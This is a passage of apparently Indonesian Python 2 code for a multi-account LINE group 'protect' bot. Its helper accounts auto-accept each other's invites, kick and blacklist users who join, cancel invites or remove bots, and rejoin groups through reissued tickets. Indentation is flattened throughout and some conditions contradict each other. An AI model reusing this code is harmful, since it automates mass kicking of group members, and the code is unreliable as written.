k2.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Creator:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Creator:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Creator:
k5.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in mid:
if op.param2 in Amid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Bmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Cmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Dmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Emid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Fmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Gmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Hmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Imid:
cl.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Amid:
if op.param2 in mid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Cmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Dmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Emid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Fmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Gmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Hmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Imid:
ki.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Bmid:
if op.param2 in mid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Amid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Dmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Emid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Fmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Gmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Hmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Imid:
kk.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Cmid:
if op.param2 in mid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Amid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Bmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Dmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Emid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Fmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Gmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Hmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Imid:
kc.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Dmid:
if op.param2 in mid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Amid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Bmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Cmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Emid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Fmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Gmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Hmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Imid:
ks.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Emid:
if op.param2 in mid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Amid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Bmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Cmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Dmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Fmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Gmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Hmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Imid:
k1.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Fmid:
if op.param2 in mid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Amid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Bmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Cmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Dmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Emid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Gmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Hmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Imid:
k2.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Gmid:
if op.param2 in mid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Amid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Bmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Cmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Dmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Emid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Fmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Hmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Imid:
k3.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Hmid:
if op.param2 in mid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Amid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Bmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Cmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Dmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Emid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Fmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Gmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Imid:
k4.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Imid:
if op.param2 in mid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Amid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Bmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Cmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Dmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Emid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Fmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Gmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Hmid:
k5.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
#--------------------------------------------------------
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or op.param2 in owner:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or op.param2 in owner:
ki.acceptGroupInvitation(op.param1)
else:
ki.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Bmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or op.param2 in owner:
kk.acceptGroupInvitation(op.param1)
else:
kk.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Cmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or op.param2 in owner:
kc.acceptGroupInvitation(op.param1)
else:
kc.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Dmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or op.param2 in owner:
ks.acceptGroupInvitation(op.param1)
else:
ks.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Emid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or op.param2 in owner:
k1.acceptGroupInvitation(op.param1)
else:
k1.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Fmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or op.param2 in owner:
k2.acceptGroupInvitation(op.param1)
else:
k2.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Gmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or op.param2 in owner:
k3.acceptGroupInvitation(op.param1)
else:
k3.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Hmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or op.param2 in owner:
k4.acceptGroupInvitation(op.param1)
else:
k4.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Imid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or op.param2 in owner:
k5.acceptGroupInvitation(op.param1)
else:
k5.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
#--------------------------------------------------------
if op.type == 17:
if wait["Protectjoin"] == True:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif op.param2 in admin:
pass
elif op.param2 in owner:
pass
else:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
cl.sendText(op.param1, "Protect Join nya On Boss\nMatiin dulu kalo mau Ada yang Gabung\nJoinn on/off")
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
cl.sendText(op.param1, "Protect Join nya On Boss\nMatiin dulu kalo mau Ada yang Gabung\nJoinn on/off")
#------Joined User Kick start------#
if op.type == 32:  # whoever cancels a pending invitation gets kicked immediately
if wait["Protectcancel"] == True:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif op.param2 in admin:
pass
elif op.param2 in owner:
pass
else:
random.choice(KAC).sendText(op.param1, "Jangan di cancel woy...!!!\nAdmin Bukan,Owner Juga Bukan\Kick Ah 😛")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
#------------------NOTIFIED_KICKOUT_FROM_GROUP-----------------
if op.type == 19:
if wait["AutoKick"] == True:
try:
if op.param3 in Bots:
pass
if op.param2 in Bots:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
kk.inviteIntoGroup(op.param1,[op.param3])
except:
try:
if op.param2 not in Bots:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
else:
pass
#-----------------------------------------------------------------
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
G = kk.getGroup(op.param1)
G.preventJoinByTicket = True
kk.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
ks.kickoutFromGroup(op.param1,[op.param2])
k1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ks.getGroup(op.param1)
G.preventJoinByTicket = False
ks.updateGroup(G)
Ti = ks.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
X = kc.getGroup(op.param1)
X.preventJoinByTicket = True
kc.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
k1.kickoutFromGroup(op.param1,[op.param2])
k2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k1.getGroup(op.param1)
G.preventJoinByTicket = False
k1.updateGroup(G)
Ti = k1.reissueGroupTicket(op.param1)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
X = ks.getGroup(op.param1)
X.preventJoinByTicket = True
ks.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
k2.kickoutFromGroup(op.param1,[op.param2])
k3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k2.getGroup(op.param1)
G.preventJoinByTicket = False
k2.updateGroup(G)
Ti = k2.reissueGroupTicket(op.param1)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
X = k1.getGroup(op.param1)
X.preventJoinByTicket = True
k1.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Fmid in op.param3:
if op.param2 in Bots:
pass
try:
k3.kickoutFromGroup(op.param1,[op.param2])
k4.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k3.getGroup(op.param1)
G.preventJoinByTicket = False
k3.updateGroup(G)
Ti = k3.reissueGroupTicket(op.param1)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
X = k2.getGroup(op.param1)
X.preventJoinByTicket = True
k2.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Gmid in op.param3:
if op.param2 in Bots:
pass
try:
k4.kickoutFromGroup(op.param1,[op.param2])
k5.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k4.getGroup(op.param1)
G.preventJoinByTicket = False
k4.updateGroup(G)
Ti = k4.reissueGroupTicket(op.param1)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
X = k3.getGroup(op.param1)
X.preventJoinByTicket = True
k3.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Hmid in op.param3:
if op.param2 in Bots:
pass
try:
k5.kickoutFromGroup(op.param1,[op.param2])
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k5.getGroup(op.param1)
G.preventJoinByTicket = False
k5.updateGroup(G)
Ti = k5.reissueGroupTicket(op.param1)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
X = k4.getGroup(op.param1)
X.preventJoinByTicket = True
k4.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Imid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ti = cl.reissueGroupTicket(op.param1)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = k5.getGroup(op.param1)
X.preventJoinByTicket = True
k5.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
#--------------------------------------------------------
if op.type == 19:
if op.param3 in admin or op.param3 in owner:
if op.param2 not in Bots:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
if op.type == 19:
if op.param3 in admin or op.param3 in owner:
if op.param2 in Bots:
try:
cl.inviteIntoGroup(op.param1,[op.param3])
except:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
if op.type == 19:
if op.param3 in admin or op.param3 in owner:
if op.param2 not in Bots:
try:
k1.kickoutFromGroup(op.param1,[op.param2])
k1.inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
if op.param3 in induk:
if op.param2 not in Bots:
try:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
random.choice(DEF).inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
cl.acceptGroupInvitation(op.param1)
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
# if op.type == 19:
# if op.param2 not in Bots:
# if op.param3 in mid:
# if op.param2 not in Bots:
# try:
# random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
# G = random.choice(DEF).getGroup(op.param1)
# G.preventJoinByTicket = False
# random.choice(DEF).updateGroup(G)
# Ticket = random.choice(DEF).reissueGroupTicket(op.param1)
# cl.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# G = random.choice(DEF).getGroup(op.param1)
# G.preventJoinByTicket = True
# random.choice(DEF).updateGroup(G)
# wait["blacklist"][op.param2] = True
# except:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# G = random.choice(KAC).getGroup(op.param1)
# G.preventJoinByTicket = False
# random.choice(KAC).updateGroup(G)
# Ticket = random.choice(KAC).reissueGroupTicket(op.param1)
# cl.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# G = random.choice(KAC).getGroup(op.param1)
# G.preventJoinByTicket = True
# random.choice(KAC).updateGroup(G)
# wait["blacklist"][op.param2] = True
#
#-----------------------------------------------
# if op.type == 19:
# if op.param2 not in Bots:
# if op.param3 in Bots:
# if op.param2 not in Bots:
# try:
# cl.kickoutFromGroup(op.param1,[op.param2])
# G = cl.getGroup(op.param1)
# G.preventJoinByTicket = False
# cl.updateGroup(G)
# Ticket = cl.reissueGroupTicket(op.param1)
# ki.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# kk.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# kc.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# ks.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k1.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k2.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k3.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k4.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k5.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# G = cl.getGroup(op.param1)
# G.preventJoinByTicket = True
# cl.updateGroup(G)
# wait["blacklist"][op.param2] = True
# except:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# G = random.choice(KAC).getGroup(op.param1)
# G.preventJoinByTicket = False
# random.choice(KAC).updateGroup(G)
# Ticket = random.choice(KAC).reissueGroupTicket(op.param1)
# cl.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# ki.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# kk.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# kc.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# ks.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k1.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k2.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k3.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k4.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# k5.acceptGroupInvitationByTicket(op.param1,Ticket)
# time.sleep(0.001)
# G = random.choice(KAC).getGroup(op.param1)
# G.preventJoinByTicket = True
# random.choice(KAC).updateGroup(G)
# wait["blacklist"][op.param2] = True
#--------------------------------
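        # op.type 22 and 24: when wait["leaveRoom"] is enabled, the main account automatically leaves the chat room it was pulled into.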
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
                url = msg.contentMetadata["postEndUrl"]  # auto-like: take the post URL from the shared-post metadata
cl.like(url[25:58], url[66:], likeType=1001)
#===========================================
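        # Greeting handlers: op.type 17 (someone joined the group) and op.type 15 (someone left) make a random helper account post the welcome / goodbye message, skipping the bot accounts themselves.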
if op.type == 17:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
            random.choice(KAC).sendText(op.param1, "╔═════════════\n║Welcome to " + str(ginfo.name) + "\n╠═════════════\n" + "║Founder =>>> " + str(ginfo.name) + " :\n║" + ginfo.creator.displayName + "\n╠═════════════\n" + "║😊Hope you feel at home 😘 \n╠═════════════\n║No sulking, no misbehaving, no being stubborn..!! \n╚═════════════")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if op.param2 in Bots:
return
            random.choice(KAC).sendText(op.param1, "╔═════════════\n║That one took it personally :v \n╠═════════════\n║Probably just needed attention 😊 \n╚═════════════")
print "MEMBER HAS LEFT THE GROUP"
#--------------------------------------------------------
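        # Invite-by-contact flow: once an admin enables wait["winvite"], the next contact card shared by an admin is resolved, checked against the blacklist, and invited into the group.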
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
ki.sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["winvite2"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = random.choice(KAC).getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
random.choice(KAC).sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
random.choice(KAC).sendText(msg.to,"Sorry, " + _name + " On Blacklist")
random.choice(KAC).sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
random.choice(KAC).findAndAddContactsByMid(target)
random.choice(KAC).inviteIntoGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Selesai di Invite : \n➡" + _name)
wait["winvite2"] = False
break
except:
try:
random.choice(KAC).findAndAddContactsByMid(invite)
random.choice(KAC).inviteIntoGroup(op.param1,[invite])
wait["winvite2"] = False
except:
random.choice(KAC).sendText(msg.to,"Error Boss, di tunggu beberapa saat lagi boss")
wait["winvite2"] = False
break
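        # Blacklist bookkeeping: while one of the wblack / dblack / wblacklist / dblacklist flags is set, the next shared contact is added to or removed from the comment blacklist or the kick blacklist; the "contact" flag instead echoes the shared profile's details.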
if op.type == 26:
msg = op.message
if msg.contentType == 13:
